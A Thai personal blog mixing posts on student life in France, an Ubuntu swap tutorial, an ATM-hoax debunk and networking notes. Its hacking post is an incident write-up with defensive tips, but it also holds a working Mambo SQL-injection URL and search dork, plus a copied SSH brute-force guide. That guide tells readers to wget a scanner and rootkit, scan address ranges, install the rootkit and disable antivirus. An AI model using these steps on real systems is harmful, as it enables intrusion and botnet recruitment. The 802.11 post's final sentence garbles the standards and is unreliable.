วันพรุ่งนี้ ผมคงต้องไป Prefecture ที่ไม่ได้อยู่ใน CROUS ที่คนรอเยอะ ๆ โดยต้องไปรับเอกสารมากรอกก่อน แล้วค่อยไปส่งอีกที ได้ข่าวว่าต้องรอกันเป็น 10 ชั่วโมงเลย คงได้นอนหน้า prefecture แน่ มันก็ไม่ได้คิดจะปรับปรุงนะ คงเป็นเพราะไม่อยากให้คนเข้าประเทศมันเยอะ ๆ มั้ง? :-(

หลังจากนั้นก็ได้ไปที่ EDF เพื่อไปเปลี่ยนบัญชีค่าไฟฟ้า
โดยให้มันตัดที่บัญชีธนาคารของผมเอง แทนที่จะไปตัดบัญชี ของรุ่น พี่ โดยให้มันตัดบัญชี ในวันที่ 24 ของ ทุก ๆ เดือน ซึ่งเค้าจะมีการคำนวนค่าไฟฟ้าแต่ละเดือนให้คร่าว ๆ โดยตัดเงินในบัญชีเราตามที่ประมาณการไว้ ซึ่งใช้หลักการว่าถ้าใช้ไฟเกิน ก็จะตัดตามจริง แต่ถ้าใช้ไฟ ไม่ถึง ก็จำทำเรื่องคืนเงินให้เมื่อสิ้นปี (ทำไม ไม่คืนให้ในเดือนต่อไปเลยวะเนี่ย ?) แต่มาอยู่บ้านเมืองเค้า ใช้ระบบแบบนี้ก็ต้องตามน้ำไปละครับ

สรุปตอนนี้ก็เรียบร้อยไปหลายอย่างแล้ว สิ่งที่เหลืออยู่ก็คือ
- Carte de sejour ของ แฟน
- Internet & Telephone กำลังหาข้อมูลอยู่ ระหว่าง Free Box, Neuf, Orange etc. ใครสนใจ ISP เจ้าไหน ลองดูข้อมูลจาก http://www.adsl-facile.com/ เปรียบเทียบได้เยอะดี
- CAF สำหรับ refund ค่าบ้าน ผมคงได้ 50% มั้ง เพราะไม่ได้ทำงาน รุ่นพี่บอกว่าต้องกรอกให้ดี ๆ โดยบอกว่าเป็น นร. ทุน CROUS และ แฟน ไม่ได้ทำงาน จะได้ refund คืนมาเยอะ
- ติดต่อลงทะเบียนเรียน Master 2 recherche ( เตรียม ปริญญาเอก) + เรียนภาษาฝรั่งเศสฟรี
- นำจดหมายจาก Professor ไปให้เจ้าหน้า CROUS เนื่องจากผมต้องเรียน Master ก่อน แต่ในทุน CROUS ให้เป็น Doctoral แทน ไม่รู้ว่า CROUS จะออกให้หรือเปล่า ถ้าได้ก็ดี ประหยัดเงิน ไปประมาณ 2 หมื่นกว่าบาท ถ้าเรียนจบได้ ผมได้ทั้ง Master & Ph.D. เลยนะเนี่ย :-)

อ้อ วันก่อนลืมบอกไปว่า LMDE ที่ CROUS ทำให้ วงเงินประกันสูงสุดเลย ว่าง ๆ ไปขูดหินปูนฟรีเล่นดีกว่า

ไว้แค่นี้ก่อนแล้วกัน แล้วจะกลับมาเล่าอีกทีนะครับ

ว่าด้วยเรื่อง VISA Schengen ล่าช้า

สำหรับใครที่จะเดินทางมาฝรั่งเศส (โดยเฉพาะนักเรียนทุนทั้งหลาย) ผมขอเอาเรื่องราว ของ อ. โก้ มาเล่าให้ฟังนะครับ

อ. โก้ เล่าว่า

ผมต้องเลื่อนการเดินทางครับ
เพราะด้วยความที่ไม่ค่อยเข้าท่าของสถานฑูตครับผมทำวีซ่าไปเดือนหนึ่งเต็มๆ แล้ว
ตอนทำเค้าก้อบอกว่าเสร็จแล้วจะรีบโทรมาบอกผมโทรไปหลายครั้งมาก
แต่ก็ไม่เคยมีใครรับสายเลย มีแต่เครื่องตอบรับ

ตอนแรกจองตั๋วไว้เดินทางวันศุกร์ที่ 12
ผมเลยเมล์ไปถามว่าตกลงแล้ววีซ่าผมมีปัญหาอะไรมั้ย ก้อไม่มีการตอบมาอีก ตอนบ่ายๆ
วันที่ 11 ผมเลยตัองตัดสินใจเลื่อนตั๋วไปก่อนเพราะว่าเลื่อนได้ไม่เกิน 4 โมงเย็น
ผมรอจนถึงวินาทีสุดท้ายเลยเลื่อนตั๋วไปอีกหนึ่งสัปดาห์(เผื่อว่าวีซ่าควรจะเสร็จได้)
พอตก 5 โมงเย็น ผมได้รับเมล์จากสถานฑูต บอกว่าพรุ่งนี้(12 กย) ให้มารับวีซ่าได้ช่วง
14.00-15.30 น
ผมงี้เซ็งไปเลย ให้ผมไปรับบ่ายสองแล้วก็วันสุดท้ายเนี้ยน่ะ
ผมต้องเช็คอินประมาณหกโมงด้วย
คิดว่าตัดสินใจถูกแล้วล่ะที่เลื่อนตั๋ว
เพราะผมก็ไม่อยากรีบต้องไปเอาวีซ่า แล้วต้องรีบๆ
ไปที่สนามบินอีก
ไม่รู้น่ะว่าคนอื่นๆ จะเหมือนกับผมมั้ย
เพราะตอนทำวีซ่าผมก็บอกชัดเจนแล้วว่าผมต้องเดินทางวันไหน และผมขอก่อน 1
เดือนเต็มเลย ซึ่งมันควรจะต้องเสร็จแล้ว

สรุปแล้วผมออกเดินทางจาก กท วันที่ 19 กยครับ ถึง Monpellier
20 กย ประมาณบ่ายโมง

ปัญหานี้เป็นปัญหาที่สำคัญด่านแรก ผมขอแนะนำว่าควรขอ visa ล่วงหน้าก่อนประมาณ 3 เดือนจะปลอดภัยที่สุดครับ เพราะยิ่งยื่นช้า จองตั๋วเครื่องบินช้า ราคาก็ยิ่งแพง ยิ่งลำบากด้วยครับและผมพาแฟนไปด้วย ทำให้ไม่แน่ใจว่า วีซ่าแฟนจะผ่านด้วยหรือเปล่า? และที่สถานฑูตติดต่อยากจริง ๆ ครับ โดยทั่วไปแล้ว visa ระยะยาวจะใช้เวลาประมาณ 1 เดือน ของผมได้ visa ก่อนเดินทางจริง ๆ ประมาณเกือบ 2 เดือนเลยครับ ส่วน พี่ชายผมได้วีซ่าก่อนวันเดินทางจริง 1 วันครับ ได้ลุ้นเหมือนกัน

สิ่งที่จำเป็นต้องทำเมื่อมาถึงฝรั่งเศส

1. แน่นอนว่าต้องไปหา Professor ก่อน ^_^
2. เปิดบัญชีธนาคาร ต้องเปิด 2 บัญชี คือ บัญชีออมทรัพย์กับบัญชีสำหรับบัตรเครดิต ค่าบริการก็ 6 ยูโร ต่อเดือน
3. ติดต่อ CROUS ขอประกันสุขภาพ กับ ยกเว้นค่าลงทะเบียน ถ้ามาถึงฝรั่งเศสช่วงนี้คนเยอะมาก เลยต้องนัดวันมาคุยอีกที
4. ติดต่อ CAF สำหรับขอ Refund ค่าหอพักคืน ได้ประมาณ 50% เลยนะ
5. ติดต่อ Tele France สำหรับขอให้ปล่อยสัญญาณคู่สายโทรศัพท์ (ทุกห้องในฝรั่งเศสจะมีคู่สายโทรศัพท์อยู่แล้ว เพียงแต่ตัดสัญญาณไว้)
6. ติดต่อ Free Box สำหรับ internet + VoIP เพื่อโทรฟรีไปเมืองไทย จริง ๆ แล้วมีหลายยี่ห้อ แต่ยี่ห้อนี่คุ้มที่สุด เพราะมี promotion โทรฟรีด้วย
7. ติดต่อทำบัตร metro + bus เป็นบัตรสีฟ้า ๆ ของ Tisso ราคา นศ. (แถวยาวมาก ๆ)
8. ติดต่อ Prefecture สำหรับ Carte de sejour อันนี้สำคัญมาก
9. นัดเจ้าของหอพักจ่ายเงินทำสัญญาอยู่ห้องพัก (Contrat)
10. LMDE ทำประกันสุขภาพ (ให้แฟนผม) โดยนำเอกสารจาก CROUS เพื่อขอประกันสุขภาพ (Securite Sociale) ได้ฟรีซะด้วย ดีจังเลย
11. EDF ค่าไฟฟ้าสำหรับบ้านของเรา ใบนี้สำคัญมาก เวลาที่แฟนผมจะไปขอ carte de sejour คงต้องใช้ใบนี้เป็นหลักฐานแสดงที่อยู่ที่เราอยู่จริง ๆ เพราะ contrat ที่ทำกับเจ้าของบ้านอย่างเดียวใช้ไม่ได้ -_-"

ก่อนไปทุกที่แนะนำว่าควรหาล่ามที่พูดภาษาฝรั่งเศสไปด้วยนะครับ ไม่งั้น คุยกันลำบากแน่ ๆขนาดเจ้าหน้าที่ธนาคารเค้ายังพูดภาษาอังกฤษไม่ค่อยได้เลยครับ แล้วจะมา update รายละเอียดเพิ่มอีกที

เรื่อง Visa ของฝรั่งเศส

ผมขอ visa มาฝรั่งเศสโดยใช้ passport ราชการ เพื่อที่จะได้ไม่ต้องเสียค่าธรรมเนียม visa (ประมาณ 5,000 บาท) และเข้าออกประเทศได้สะดวกกว่าใช้หลักฐานน้อยกว่า ก็เลยได้ visa เป็น type Services ทีนี้ เวลาติดต่อสายการบิน มีหลายแห่ง บอกว่า Type ประเภทนี้ ซื้อตั๋วราคา นักเรียนไม่ได้ แต่ก็ได้บริษัท Jupiter Venture ขายตั๋วให้ผมในราคา นักเรียนได้ ( 30,600 บาท BKK -> Paris ถ้าราคาปรกติจะอยู่ที่38,100 บาท) แถมผมยังได้ตั๋วจาก CDG -> TLS ในราคาเพียง 3,050 อีกด้วย โชคดีจริง ๆ

ส่วนของแฟนได้ visa เป็น type visiter ตอนแรกก็เครียดอยู่นาน เพราะ ได้ข้อมูลมาจากหลาย ๆ ที่ว่า visa visiter มันซื้อตั๋ว one-way ไม่ได้ เนื่องจาก การที่จะซื้อตั๋วแบบ one-way นั้น type ของ visa จะต้องเป็น นักเรียน/ทำงาน/ผู้ติดตาม เท่านั้น ก็เลยหาข้อมูลจากหลาย ๆ ที่ก็พบว่า visiter นี่แหละ คือ type ผู้ติดตามแล้ว ตอนแรก ผมเข้าใจว่าเป็น type ท่องเที่ยว ถ้าเป็นแบบนั้น ซื้อตั๋ว one-way ไม่ได้แน่นอน
type ของ visa เท่าที่เคยเจอตอนนี้มี

non-professional => ท่องเที่ยว (ได้ตอนขอ visa ระยะสั้น)
services => ราชการ
etudiant => นักเรียน
visiter => ผู้ติดตาม

แล้วใช้ ชนิดของ visa มันจะมี type ย่อย ๆ ด้วยนะ
ถ้าเป็น type C แสดงว่า เป็นแบบ tourism
แต่ถ้าเป็น type D แสดงว่า อยู่ได้นาน แบบนี้ทำ carte de sejour ได้

เวลาขึ้นเครื่องแนะนำให้หาพวกกระเป๋ากระสอบที่แม่ค้าขายของใส่ จะประหยัดน้ำหนักได้มากตอนที่ขึ้นเครื่องผมไปกับแฟน load น้ำหนักไป 65 kg. ไม่โดนเก็บเงินค่า load เลยแฮะดีจังแต่ตอนลงสนามบิน เนื่องจาก taxi ราคาแพง ก็เลยนั่งรถเมล์ ไอกระเป๋าที่ไม่มีล้อเนี่ย หนักโคตร ๆ เลย

Swap ใน Linux Ubuntu

Swap คืออะไร ?
Swap คือ ไฟล์ประเภทหนึ่งที่ทำหน้าที่เสมือนหน่วยความจำให้เราใช้
และจำทำงานเมื่อ RAM ในเครื่องจริง ๆ ถูกใช้งานหมด
(แต่แน่นอนว่ามันเป็น disk มันก็ต้องทำงานช้ากว่า RAM อยู่แล้ว)
นอกจากนั้น swap จะทำหน้าที่หลักเหมือนเป็น RAM สำรองแล้ว swap ยังใช้ในการ
optimize การใช้ RAM รวมถึง การทำ Hibernation ด้วย

การสร้าง swap แบบ Manual
สร้าง swap file โดยคำสั่ง
root# dd if=/dev/zero of=/mnt/512Mb.swap bs=1M count=512
dd = โปรแกรม ที่ใช้ในการ convert และ copy file
bs=1M หมายถึง ขนาดแต่ละบล็อค เท่ากับ 1 Mb.
count = 512 หมายถึง มีจำนวน 512 บล็อค

จากนั้นจัดการ format file นี้ ให้เป็น swap file system โดยคำสั่ง
root# mkswap /mnt/512Mb.swap

จัดการ run swap ที่เราสร้างขึ้นมา
root# swapon /mnt/512Mb.swap

ตรวจสอบผลการ add swap ได้จาก คำสั่ง
root# cat /proc/meminfo

หรือ ใช้
root# fdisk -l | grep swap
หรือ
root# free

ทีนี้ เวลาเรา boot เครื่องใหม่ swap มันก็หายไปอีก
เราสามารถ add swap ให้ add ลงในระบบอัตโนมัติ โดยการแก้ไข file

root# vi /etc/fstab
แล้วก็เพิ่มบรรทัดนี้ /mnt/512Mb.swap none swap sw 0 0

แล้วก็ reboot ระบบ เพื่อดูผล

หรือในกรณีที่เรามี partition สำหรับทำ swap อยู่แล้ว แต่มันอาจจะไม่ได้ add ลง ระบบ
เราสามารถจัดการได้ดังนี้

สั่ง root# fdisk -l | grep swap
เพื่อตรวจสอบ swap partition ก่อน สมมุติว่า swap partition เป็น hda3

จากนั้น จัดการ /etc/fstab ให้มีบรรทัดนี้
/dev/hda3 none swap sw 0 0

เรา re-enable swap ได้ดังนี้
root# swapoff -a
root# /sbin/mkswap /dev/hda3
root# swapon -a

เมื่อถึงคราวถูก Hack!!

เมื่อถึงคราวถูก Hack!!

(PSU Link: http://netserv.cc.psu.ac.th/home2/index.php?option=com_content&task=view&id=412&Itemid=27 )

ตั้งแต่มีโอกาสได้ช่วยดูแล server ก็มีเหตุการณ์ถูก hack ด้วยกัน 2 ครั้ง ผมก็เลยอยากแบ่งปันประสบการณ์ให้ครับ

ครั้งแรก เมื่อปีที่แล้ว จำไม่ได้ว่าวันไหน หน้า web page โดนเปลี่ยน จาก hacker ตอนที่หาสาเหตุครั้งนั้นพบว่า เป็น bug calendar component ของ mambo ที่ไม่ได้ update ครับ ซึ่งการถูกเจาะระบบในครั้งนั้นทำให้ได้ความรู้มาดังนี้

เริ่มกระบวนการเจาะระบบ
1. หา web site ที่มีช่องโหว่ของ bug ตัวนี้ด้วย
Google ==> http://www.google.co.th/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=th&start=0&sa=N

2. วิธีการทำ SQL Injection เพื่อดู user/passwd
=> http://TargetHost/index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

3. passwd ที่แสดงนั้นจะถูกเข้ารหัสทางเดียวแบบ MD5 ถ้าใครตั้ง passwd ง่าย ๆ ก็มีโอกาสที่จะค้นหาเจอ
โดยให้เราเอา passwd ที่ได้ไปค้นหาใน
=> http://www.tmto.org/?category=main&page=search_md5

4. เมื่อได้ user/pass มาแล้ว เราก็สามารถ login เข้า mambo ได้แล้ว
โดย login ผ่าน
http://---Host name หน้าหลัก---/
หรือ
http://---Host name หน้าหลัก---/administrator/ (กรณีที่รู้ passwd ของ admin)

วิธีป้องกัน
ให้ตั้ง passwd ให้ยาก ๆ และ update software mambo ให้เป็น version ใหม่ ๆ ครับ

เพิ่มเติม เพื่อความปลอดภัยของ Mambo site ของท่าน
1. เวลาติดตั้ง mambo อย่าลืม change mode file configuration.php เป็น 644 ด้วยน่ะครับ
2. อย่าติดตั้ง component เสียงภัยเหล่านี้
http://help.mambohub.com/component/option,com_frontpage/Itemid,2/index.php?option=com_content&task=view&id=232&Itemid=1

---

ครั้งที่ 2 ผมได้รับ mail แจ้งจาก ผู้ดูแลระบบ ที่หาดใหญ่ว่า เครื่อง mail server ได้ run bot mIRC แล้วส่งข้อมูลไปรบกวนในลักษณะ DDoS เจ้า bot ตัวนี้ ชื่อว่า energymech

> There are connections from your netspace connected to our
> network and it appears that these host(s) have been
> compromised and had an Energymech (emech bot)installed on
> it, the connections are also controllable by one or a group
> of persons and is being used as part of a botnet, which is
> involved in flooding and very likey used in other illegal
> activities, and can and likely be used in Ddos (Distributed
> denial of service) attacks against innocent users.

ผมก็ไม่รอช้า รีบเข้าไปตรวจสอบร่องรอย โดยใช้ netstat เพื่อตรวจสอบ
network connection ว่ามีเครื่องไหนใช้ port 666x บ้าง เพราะ เจ้า bot ตัวนี้
จะทำงานที่ port 666x ก็พบว่าโดนเข้าให้แล้วครับ

root@mail:/var/tmp# netstat -tna  grep 666
tcp        0     40 172.26.0.8:34802        69.16.172.40:6666       FIN_WAIT1
tcp        0      0 172.26.0.8:54453        82.196.213.250:6660     ESTABLISHED
tcp        0      1 172.26.0.8:49826        129.27.9.248:6660       SYN_SENT
tcp        0     40 172.26.0.8:45078        193.109.122.67:6660     FIN_WAIT1
tcp        0      1 172.26.0.8:45048        194.109.20.90:6667      SYN_SENT
tcp        0      0 172.26.0.8:37625        195.144.12.5:6669       ESTABLISHED
tcp        0      1 172.26.0.8:42750        195.47.220.2:6667       SYN_SENT
tcp        0      1 172.26.0.8:50350        195.68.221.221:6667     SYN_SENT

จากนั้นผมก็ไม่รอช้า รีบค้นหาเลยว่า ไอโปรแกรมที่มันเปิด port นี้ มันอยู่ที่ไหน
โดยใช้คำสั่ง LiSt Open File => lsof –i tcp: ตามด้วยหมายเลข port ที่เราต้องการจะตรวจสอบ

root@mail:/var/tmp# lsof -i tcp:6667
COMMAND   PID USER   FD   TYPE  DEVICE SIZE NODE NAME
linux   31140 root    1u  IPv4 4403060       TCP mail.coe.phuket.psu.ac.th:55573->irc2.saunalahti.fi:ircd (SYN_SENT)
linux   31140 root    2u  IPv4 4403062       TCP mail.coe.phuket.psu.ac.th:48111->zagreb.hr.eu.undernet.org:ircd (ESTABLISHED)
linux   31140 root    4u  IPv4 4403064       TCP mail.coe.phuket.psu.ac.th:41608->oslo1.no.eu.undernet.org:ircd (SYN_SENT)

พบว่าโปรแกรมที่เปิด port 6667 ก็คือโปรแกรมที่ชื่อว่า linux ครับ

ผมลองตรวจสอบดูว่า user คนไหน ที่บังอาจมา run โปรแกรม นี้ โดยใช้คำสั่ง ps ก็พบว่า user ชื่อ demo ครับ

root@mail:/var/tmp# ps axuw  grep linux
demo     31140  0.0  0.0   1880   608 ?        Ss   22:15   0:00 ./linux

ผมก็เลยแก้ไขโดยการปิด process ด้วยคำสั่ง

root@mail:/var/tmp#  killall linux

เนื่องจากว่าเจ้า energymech มันจะมี file m.set อยู่ ผมก็เลย ลองค้นหา file นี้ในเครื่องของผมโดยใช้คำสั่ง find ครับ ก็เจอของดีเลย

root@mail:/home/wwarodom#  find / -name *.set
/home/test/..  /.t/m.set
/var/tmp/.,/cobrel/raw.set
/var/tmp/m.set

ผมลองเข้าไปดูใน /var/tmp พี่แก มี source ของ enerymech แล้ว มา compile + run ในเครื่อง server นี้เลย เก๋าจริง ๆ

จากนั้น ผมลองเข้าไปใน /home/demo/ ก็ไม่เจอ ไฟล์ linux แต่ก็เลยลองไปคุ้ยใน .bash_history เจอของดีที่ทำให้ผมรู้ว่ามันเจาะระบบผ่านทาง SSH Brute Force ครับ

root@mail:/home/demo# more .bash_history
w
cat /proc/cpuinfo
passwd
ps x
cd /tmp
ls -a
tar xvf nonmin.tar.tar
cd nonmin
./Scan 210.243
./Scan 64.22
./Scan 133.38
./Scan 221.148
./Scan 210.87
./Scan 213.77
./Scan 79.189
./Scan 87.239
cd /var/tmp
perl
tar xvf diana.jpg
ls -a
cd
ls -a
wget members.lycos.co.uk/chicka/diana.jpg
ls -a
rm -rf diana.jpg
cd /var/tmp
./linux
chmod +x *
./linux
passwd
ps x
cd /var/tmp
ls -a
./linux

แหม พี่แกเข้ามาถึงปุ๊บ ดู cpu เราก่อนเลยนะ สงสัยกำลังคิดว่า ถ้า cpu แรง ๆ คงไว้ยิงชาวบ้านเค้าได้เต็มที่ แต่คงต้องผิดหวังละครับ เพราะเจ้า mail server เครื่องนี้ไม่ได้แรงมาก ฮ่า ๆ ๆ จากนั้นพี่แกก็เอาเครื่อง server นี่แหละ ไปยิงหาช่วงโหว่ชาวบ้านเค้า เพื่อตัวเองจะแอบไปใช้ต่อ เลวจริง ๆ จากนั้นพี่แกก็เอาไอเจ้า bot ตัวนี้แหละ ลงในเครื่อง server (ตั้งชื่อ file .tar เป็น .jpg เท่ห์มากเลยนะจ๊ะ) แล้วก็ run bot irc เลยนะ

ตรวจสอบดูอีกครั้ง user พบว่า user test ก็โดนด้วยครับ

root@mail:/home/test# lsof -u test
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 5607 test cwd DIR 8,1 4096 368723 /home/test/.. /.t
bash 5607 test rtd DIR 8,1 4096 2 /
bash 5607 test txt REG 8,1 397274 368725 /home/test/.. /.t/bash
bash 5607 test mem REG 8,1 67408 6824107 /lib/tls/i686/cmov/libresolv-2.7.so

root@mail:/home/test# ps axuw grep bash
test 5607 0.0 0.0 2024 976 ? Ss Aug17 0:23 bash
root 30824 0.0 0.0 4156 1832 pts/0 Ss+ 21:53 0:00 -bash
root 31088 0.0 0.0 4204 1872 pts/1 Ss 22:10 0:00 -bash
root 31276 0.0 0.0 3008 776 pts/1 S+ 22:31 0:00 grep bash

แถมอันนี้พี่แกตั้งชื่อโปรแกรม ว่า bash หลอกให้เราคิดว่าเป็น shell ด้วย!!
ผมก็จัดการ

root@mail:/home/test# kill -9 5607

ผมลอง cross check อีกครั้ง ด้วยคำสั่ง last ก็พบว่า เจ้านี่ มันเข้ามาในระบบเราจริง ๆ ด้วย

root@mail:/home/demo# last  grep demo
demo     pts/2        host225-57-dynam Mon Aug 25 22:33 - 22:33  (00:00)
demo     pts/2        host20-31-dynami Fri Aug 15 23:20 - 01:52  (02:31)
demo     pts/1        121.14.139.26    Fri Aug 15 23:20 - 23:29  (00:09)
demo     pts/0        60-250-3-222.hin Wed Aug 13 01:54 - 01:54  (00:00)

เอ๊ะ ๆ มอง IP ที่มาไม่ชัด เอาใหม่ ดีกว่า

root@mail:/home/demo# last -a  grep demo
demo     pts/2        Mon Aug 25 22:33 - 22:33  (00:00)     host225-57-dynamic.16-87-r.retail.telecomitalia.it
demo     pts/2        Fri Aug 15 23:20 - 01:52  (02:31)     host20-31-dynamic.52-82-r.retail.telecomitalia.it
demo     pts/1        Fri Aug 15 23:20 - 23:29  (00:09)     121.14.139.26
demo     pts/0        Wed Aug 13 01:54 - 01:54  (00:00)     60-250-3-222.hinet-ip.hinet.net

root@mail:/home/demo# last -a  grep test
test     pts/0        Sun Aug 17 03:13 - 03:30  (00:16)     89.123.129.136
test     pts/0        Sat Aug 16 22:01 - 23:39  (01:38)     89.238.202.216
test     pts/1        Wed Aug  6 14:47 - 14:48  (00:00)     89.238.202.216
test     pts/0        Sun Aug  3 21:14 - 21:14  (00:00)     221.208.255.225
test     pts/1        Sun Aug  3 06:02 - 08:02  (02:00)     83.143.38.157
test     pts/1        Sun Aug  3 05:49 - 06:02  (00:12)     83.143.38.157

คราวนี้เห็นชัดแล้ว ว่า IP + DNS อะไร ผมก็เอาไปถามใน http://www.ip2location.com/ ว่า มันเจาะระบบมาจากประเทศไหน
ก็พบว่ามาจาก อิตาลี่ , โรมาเนีย, ไต้หวัน, จีน เยอะแยะไปหมด แสดงว่า คงมีอีกหลายเครื่องที่โดนเจ้านี่
เจาะระบบโดย SSH Brute Force Attack ซึ่งคงจะจับตัวการลำบาก เพราะเจ้าตัวการจริง ๆ คงจะไม่ได้อยู่
ในประเทศที่ไปค้นหานี่ก็ได้

สรุปตอนนี้ คือ เจ้า hacker นี้ ได้เจาะระบบ เข้ามาทาง port 22 โดยใช้ SSH Brute Force Attack
จากนั้นก็ จัดการ วาง bot IRC ไว้ ซึ่งผมก็แก้ไข โดยการ end process ที่มีปัญหาทิ้งไป และ จัดการลบ user
ที่เป็นสาเหตุของการโดน hack

จริง ๆ แล้ว เรื่องการตั้ง รหัสผ่าน ให้ยาก ๆ เนี่ย ก็รู้อยู่เต็มอก แต่อาจจะเนื่องจากการรีบเร่ง อยากทดสอบระบบ
ที่ได้พัฒนาขึ้นแบบง่าย ๆ เลยตั้ง user/ password ให้ง่าย ๆ พอทดสอบเสร็จก็ลืม ลบ user นี้ออก
ทำให้เกิดปัญหานี้ขึ้นมา ยังดีนะ ที่มันยังไม่ได้ root password

วิธีป้องกัน
- อย่าตั้ง user/pass ที่สั้นเกินไปและมีใน dictionary
- ติดตั้ง Antivirus (ClamAV) + IDS (snort + snarf)
- อนุญาตให้ใช้ ssh ได้เฉพาะบาง user ที่จำเป็นเท่านั้น
- Update program ให้ทันสมัยอยู่เสมอ
- ถ้าเป็น server ที่สำคัญมาก ๆ ควรเอา tool พวก compiler, wget ออก เพื่อให้ยากแก่การทำงานของ hacker

ความรู้เกี่ยวกับการทำ SSH Brute Force Attack
บางคนอาจจะสงสัย ว่า “SSH Brute Force” คืออะไร? ถ้าให้ตอบง่าย ๆ ก็คือ การ hack ระบบโดยการ นำข้อมูลจากใน dictionary มาทดลองดู ถ้าระบบใช้ user ที่มีใน dictionary ก็เรียบร้อยครับ

ถ้าใครอยากลองก็ทำตามนี้เลยครับ ใน sshteam.tgz จะเป็นโปรแกรมที่ติดต่อ port ssh แล้ว เอา user/pass ใน dictionary ไปทดสอบว่า ถูกต้องหรือไม่

Hacking skills in a few steps Smile (BRUTE FORCE SSH SCANNER)
1) First you have to download the scanner file with command:
wget http://geocities.com/dapheus/sshteam.tgz
2) tar zxvf sshteam.tgz
3) Enter the scanner folder using command cd sshscan
4) Type ./start B-class
5) Example: ./start 147.237
6) Scanner will scan all machines with ip 147.237.*.* for ssh22 port
7) Then start bruting/cracking password of eah box Cool The scanner will paste you the results on the main of your screen
8) If you gain root, you should install rootkit: wget http://geocities.com/dapheus/shv5.tar.gz
9) ar zxvf shv5.tar.gz
10) d shv5
11) ./setup Whoala, you have root! SSH to IP and port you chose.
( ก่อน download โปรแกรมจะต้อง ปิด Anti-Virus ก่อนนะครับ ไม่งั้น file ที่ load มาจะถูก An-ti virus ลบทิ้งไปโดยอัตโนมัติ)
Reference: http://hackhound.org/forum/index.php?topic=998.0
อันนี้ไม่ได้ให้มือใหม่ ไปหัดใช้ยิงเพื่อนคนอื่น ๆ นะ ครับ ผมอยากให้เอาไปใช้ทดลองเพื่อความรู้ของตัวเอง โดย ทดสอบในวงระบบเครือข่ายส่วนตัวเท่านั้น อย่าไปทดสอบกับระบบจริงข้างนอก ไม่งั้นเพราะ ผู้ดูแลระบบข้างนอกเค้าตรวจสอบได้นะครับ
หวังว่าคงจะมีประโยชน์กับผู้ที่เข้ามาอ่าน และ ครั้งนี้คงเป็นครั้งสุดท้ายที่โดน hack ครับ

สรุปโดย

วโรดม วีระพันธ์ (wwarodom at gmail.com)

รหัสผ่าน ATM ที่ forward mail กัน

ข้อความใน Forward Email:

ถ้าคุณถูกบังคับ ข่มขู่เงินจากโจรผู้ร้าย ให้กดเงินให้คุณผ่าน ATM ให้คุณกด รหัส กลับกัน เช่น รหัสของคุณคือ 1234 แต่ให้คุณกด 4321 แทน เครื่องจะออกเงินมาให้คุณตามจำนวนที่คุณเบิก โจรจะไม่ทราบ แต่ตำรวจจะทราบ แล้วจะเข้าช่วยเหลือคุณ

ข้อมูลนี้ถูกเผยแพร่ผ่านรายการโทรทัศน์ และถูกยืนยันว่าวิธีการนี้ถูกใช้น้อยมาก เพราะว่าคนไม่รู้มีวิธีการอย่างนี้

คำอธิบาย:

ผมเคยได้รับ mail ฉบับนี้มาหลายครั้งแล้ว และอยากบอกว่ามันไม่เป็นความจริงหรอกครับ
ลองคิดโดยใช้ logic ง่าย ๆ ถ้าหาก ผมตั้งรหัสผ่านเป็น paralindrom ละ เช่น 5225, 1122, 1221 แบบนี้ ธนาคารก็ต้องคิดว่าโดนโจรจี้ตลอดสิ

อีกอย่าง ถ้าเงินออกมาแล้ว เกิดจับผู้ร้ายไม่ได้ ใครจะรับผิดชอบ ธนาคาร หรือ ลูกค้า?และ ถ้าลูกค้าโกหกว่าโดนจี้ ธนาคาร จะตรวจสอบได้อย่างไรครับ? etc....

Forward Mail ก็มีทั้งเรื่องจริง และ ไม่จริง เดี๋ยวนี้เวลาอ่านก็ต้องคิดให้ดี ๆ นะครับ ไม่จำเป็นต้องเชื่อไปทุกเรื่อง

บทความที่เคยเขียนไว้

Recursive Programming:

ไม่รู้ว่า web KnowDev.com เอามาลงไว้ตั้งแต่ตอนไหนนะ ^_^
http://www.knowdev.com/articleshis.php?contentid=186

คำถามน่าสนใจของ Java
http://www.jarticles.com/quiz/quiz1/quiz1_article.html

ว่าด้วยเรื่อง 802.1i, 802.11i, 802.1x และ 802.11x

ผมคิดว่าหลาย ๆ ที่เคยไปอ่านบทความเกี่ยวกับ WiFi Protected Access (WPA)คงจะงง กับมาตรฐานเหล่านี้ไม่น้อย และ ผมก็มากระจ่างในวันนี้ครับ

เริ่มเลยดีกว่า
- 802 Project คืออะไร? 802 คือ series ของ IEEE Local และ มาตรฐานของ MAN
- 802.1 อ้างอิงถึง สถาปัตยกรรมรวมไปถึงการเทคนิคเชื่อมต่อของระบบเครือข่ายต่าง ๆ ซึ่งก็ถูกปรับเปลี่ยนเป็น LAN
- 802.3 อ้างอิง ถึง Ethernet LAN802.11 อ้างอิง ถึง WLAN
- 802.1x (ปี 2001) กำหนด Port Access Control สำหรับทุก ๆ LANs
- 802.11i (ปี 2004) กำหนด security enhancements สำหรับทุก ๆ WLANs

แล้ว 802.1i ละ?
IEEE 802.1i (ปี 1992) เป็นมาตรฐานที่มีมานานมาก ซึ่งกำหนดเกี่ยวกับ Fiber Distributed Data Interface (FDDI) สำหรับ LAN Media Access Control Bridges.

มาตรฐานการเข้ารหัสแบบใหม่ของ TKIP และ AES กำหนดเป็น 802.1x ซึ่งก็คือ port based authentication อ้าวแล้ว 802.11x ละ? 802.11x ใช้กำหนด โครงการย่อย ๆ ของ 802.11 ที่ยังไม่ได้คิดเป็นมาตรฐานออกมาหรือ คล้ายๆ xDSL นั่นเอง กำหนดเป็น ADSL, VDSL, HDSL etc ...

สรุปปิดท้าย ถ้าพูดถึง security WPA ก็ต้องเป็น 802.11i แต่ถ้าเน้น port base authen ก็ต้องเป็น 802.11i ครับผม

Reference: http://expertanswercenter.techtarget.com/eac/expertAnswer/0,295208,sid63_gci996335,00.html

เรื่องราวของ Netcut

เรื่องราวของ Netcut
เมื่อมีคนใช้โปรแกรมนี้ก่อกวนเราจะทำอย่างไร?

ก่อนอื่นมาวิเคราะห์หาสาเหตุกันก่อน
Netcut ใช้หลักการ arp spoofing (หรือแหลงภาษาบ้าน ๆ ก็คือ การปลอม MAC address นั่นเอง)
